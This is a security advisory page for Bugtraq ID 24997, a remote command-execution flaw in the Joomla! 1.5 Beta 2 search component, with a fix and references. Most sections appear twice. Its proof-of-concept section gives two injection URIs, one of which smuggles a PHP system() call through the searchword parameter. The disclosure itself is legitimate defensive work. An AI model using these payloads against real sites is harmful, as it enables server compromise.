Joomla! Search Component Remote Command Execution Vulnerability
BID:24997
Info
Joomla! Search Component Remote Command Execution Vulnerability
| Bugtraq ID: | 24997 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 22 2007 12:00AM |
| Updated: | Jul 25 2007 07:15PM |
| Credit: | Johannes Greil is credited with the discovery of this issue. |
| Vulnerable: |
Joomla Joomla 1.5 Beta 2 |
| Not Vulnerable: |
Joomla Joomla 1.5 RC1 |
Discussion
Joomla! Search Component Remote Command Execution Vulnerability
Joomla! is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.
Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.
Joomla! 1.5 beta 2 is reported vulnerable; prior versions may be affected as well. Note that the stable version 1.0.13 is not affected by this issue.
Joomla! is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.
Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.
Joomla! 1.5 beta 2 is reported vulnerable; prior versions may be affected as well. Note that the stable version 1.0.13 is not affected by this issue.
Exploit / POC
Joomla! Search Component Remote Command Execution Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://www.example.com/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://www.example.com/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
Solution / Fix
Joomla! Search Component Remote Command Execution Vulnerability
Solution:
The vendor has released Joomla 1.5 RC1 to address this issue. Please see the references for more information.
Joomla Joomla 1.5 Beta 2
Solution:
The vendor has released Joomla 1.5 RC1 to address this issue. Please see the references for more information.
Joomla Joomla 1.5 Beta 2
-
Joomla Joomla-1.5RC.tar.gz
http://joomlacode.org/gf/download/frsrelease/5054/13213/Joomla-1.5RC.t ar.gz
References
Joomla! Search Component Remote Command Execution Vulnerability
References:
References:
- Roadmap (Joomla)
- SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS (SEC Consult)
- SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS (Johannes Greil
)